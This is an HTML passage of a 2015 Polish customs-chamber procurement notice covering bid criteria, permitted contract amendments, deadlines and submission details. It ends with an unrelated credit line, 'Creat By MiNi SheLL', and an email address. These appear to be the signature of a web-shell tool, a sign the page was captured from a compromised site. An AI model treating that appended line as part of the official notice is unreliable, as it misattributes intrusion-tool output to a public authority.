<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Gwarancja - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy: w stosunku do treści oferty, na  podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)Zmiana terminu realizacji przedmiotu umowy (Czasu na Ukończenie) wynikająca ze:
a)zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
-wstrzymanie realizacji umowy przez Zamawiającego;
-zmiana sposobu wykonania zamówienia;
b)zmian będących następstwem działania organów administracji, w szczególności:
-przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.;
-wydanie postanowienia o wstrzymaniu robót budowlanych z przyczyn innych niż zawinione przez Wykonawcę w przypadku, o którym mowa w art. 50 ust. 1 pkt 4 Prawa budowlanego;
-konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu,  którego konieczności nie przewidywano przy zawieraniu umowy.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1 terminy pośrednie lub czas na ukończenie wykonania umowy mogą ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Każda taka zmiana wprowadzona będzie w trybach i procedurach opisanych w Umowie.
2)Zmiany technologiczne, mogące skutkować zmianą Czasu na Ukończenie jak również  zmianą  wynagrodzenia Wykonawcy, w szczególności:
a)pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji niż opisane w dokumentach, pozwalających na zmniejszenie kosztów realizacji umowy lub kosztów eksploatacji wykonanej umowy;
b)pojawienie się nowszej technologii wykonania przedmiotu umowy pozwalającej na skrócenie czasu realizacji umowy lub jej kosztów, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
c)konieczność zrealizowania zakresu technicznego umowy przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w SIWZ w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
d)odmienne od przyjętych w dokumentacji projektowej warunki lub istnienie nie zinwentaryzowanych (nie ujętych w dokumentacji) urządzeń, instalacji lub obiektów, skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
3)Pozostałe zmiany:
a)siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)konieczność przedłużenia terminu w przypadku zaistnienia okoliczności niezależnych od stron, których nie można było przewidzieć w chwili zawierania umowy;
c)zmiany wynagrodzenia brutto Wykonawcy spowodowane zmianą stawki VAT;
d)gdy nastąpi zmiana wysokości minimalnego wynagrodzenia za prace ustalonego na podstawie art.2 ust.3-5 ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2000r. Nr 200 poz. 1679 ze zm.), jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez  wykonawcę;
e)gdy nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu  zdrowotnemu lub wysokość stawki składki na ubezpieczenie społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę;
f)Zmiany warunków i sposobu wykonywania (w tym dotyczące terminu i zasad finansowania i rozliczania) umowy w związku ze zmianą warunków finansowania zamówienia przez Zamawiającego, których nie można było przewidzieć na moment zawarcia umowy;
g)wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy -w zakresie dostosowania postanowień Umowy do zmiany przepisów prawa.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę z poszanowaniem procedur umowy. Wszystkie powyższe postanowienia nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę. Każda taka zmiana wprowadzona będzie w trybach i procedurach opisanych w Umowie.
2.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:
1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego);
2)zmiany danych teleadresowych, zmiany osób wskazanych do wykonywania zakresu Kontraktu lub kontaktów między Stronami;
3)zmiana formy zabezpieczenia należytego wykonania umowy;
4)zmiana Podwykonawców. 
3.Nie stanowi podstawy do zmiany wynagrodzenia Wykonawcy zmiana czynników cenotwórczych dla materiałów, urządzeń, energii i paliw, użytych do realizacji Umowy oraz zmiana stawek ustawowych elementów składowych wynagrodzenia pracowników, za wyjątkiem przypadków wyraźnie wskazanych w Umowie.
4.Zmiana umowy wprowadzana jest Aneksem w formie pisemnej pod rygorem nieważności. Żadna wprowadzana Aneksem zmiana umowy nie możne naruszać Prawa Zamówień Publicznych.
5.Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie podpisanego przez Strony Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności wymienionej 
w ust. 1. Protokół konieczności będzie załącznikiem do aneksu zmieniającego niniejszą umowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wroclaw.scelna.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna we Wrocławiu, Wrocław ul. Hercena 11, pok. nr 204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2015 godzina 10:00, miejsce: Izba Celna we Wrocławiu, Wrocław ul. Hercena 11, pok. nr 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Jeżeli zostanie złożona oferta, której wybór prowadziłby do obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com